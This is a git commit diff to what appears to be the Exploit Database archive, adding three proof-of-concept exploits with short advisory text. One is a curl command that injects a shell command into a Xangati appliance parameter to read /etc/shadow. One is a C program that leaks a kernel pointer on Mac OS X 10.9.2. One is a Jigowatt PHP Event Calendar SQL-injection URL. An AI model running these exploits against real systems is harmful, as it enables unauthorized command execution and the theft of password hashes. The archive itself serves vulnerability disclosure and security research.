DB: 2016-01-02

Offensive Security · Offensive Security · commit cf0225763fa0 · 2016-01-02T05:02:02.000Z
3 new exploits
diff --git a/files.csv b/files.csv
@@ -35392,3 +35392,6 @@ id,file,description,date,author,platform,type,port
 39141,platforms/php/webapps/39141.txt,"eazyCMS 'index.php' SQL Injection Vulnerability",2014-04-09,Renzi,php,webapps,0
 39142,platforms/jsp/webapps/39142.txt,"Xangati /servlet/MGConfigData Multiple Parameter Remote Path Traversal File Access",2014-04-14,"Jan Kadijk",jsp,webapps,0
 39143,platforms/jsp/webapps/39143.txt,"Xangati /servlet/Installer file Parameter Remote Path Traversal File Access",2014-04-14,"Jan Kadijk",jsp,webapps,0
+39145,platforms/cgi/webapps/39145.txt,"Xangati XSR And XNR 'gui_input_test.pl' Remote Command Execution Vulnerability",2014-04-14,"Jan Kadijk",cgi,webapps,0
+39146,platforms/php/webapps/39146.txt,"Jigowatt PHP Event Calendar 'day_view.php' SQL Injection Vulnerability",2014-04-14,"Daniel Godoy",php,webapps,0
+39147,platforms/osx/local/39147.c,"Apple Mac OS X Local Security Bypass Vulnerability",2014-04-22,"Ian Beer",osx,local,0
diff --git a/platforms/cgi/webapps/39145.txt b/platforms/cgi/webapps/39145.txt
@@ -0,0 +1,12 @@
+source: http://www.securityfocus.com/bid/66819/info
+
+Xangati XSR And XNR are prone to a remote command-execution vulnerability because the application fails to sufficiently sanitize user-supplied input data.
+
+An attacker may leverage this issue to execute arbitrary commands in the context of the affected application.
+
+Xangati XSR prior to 11 and XNR prior to 7 are vulnerable.
+
+curl -i -s -k  -X 'POST' \
+-H 'Content-Type: application/x-www-form-urlencoded' -H 'User-Agent: Java/1.7.0_25' \
+--data-binary $'key=validkey&falconConfig=validateTest&path=%2Fvar%2Ftmp%2F&params=gui_input_test.pl&params=-p+localhost;CMD%3d$\'cat\\x20/etc/shadow\';$CMD;+YES' \
+'hxxps://www.example.com/servlet/Installer'
diff --git a/platforms/osx/local/39147.c b/platforms/osx/local/39147.c
@@ -0,0 +1,34 @@
+source: http://www.securityfocus.com/bid/67023/info
+
+Apple Mac OS X is prone to a local security-bypass vulnerability.
+
+Attackers can exploit this issue to bypass certain security restrictions and perform unauthorized actions.
+
+Apple Mac OS X 10.9.2 is vulnerable; other versions may also be affected. 
+
+#include <stdio.h>
+#include <strings.h>
+#include <sys/shm.h>
+
+int main(int argc, char *argv[])
+{
+  int shm = shmget( IPC_PRIVATE, 0x1337, SHM_R | SHM_W );
+
+  if (shm < 0)
+    {
+      printf("shmget: failed");
+      return 6;
+    }
+
+  struct shmid_ds lolz;
+
+  int res = shmctl( shm, IPC_STAT, &lolz );
+  if (res < 0)
+    {
+      printf("shmctl: failed");
+      return 1;
+    }
+
+  printf( "%p\n", lolz.shm_internal );
+
+}
diff --git a/platforms/php/webapps/39146.txt b/platforms/php/webapps/39146.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/66923/info
+
+Jigowatt PHP Event Calendar is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+Jigowatt PHP Event Calendar 2.16b is vulnerable; other versions may also be affected. 
+
+http://www.example.com/code/calendar/day_view.php?day=23&month=4&year=[SQL injection] 
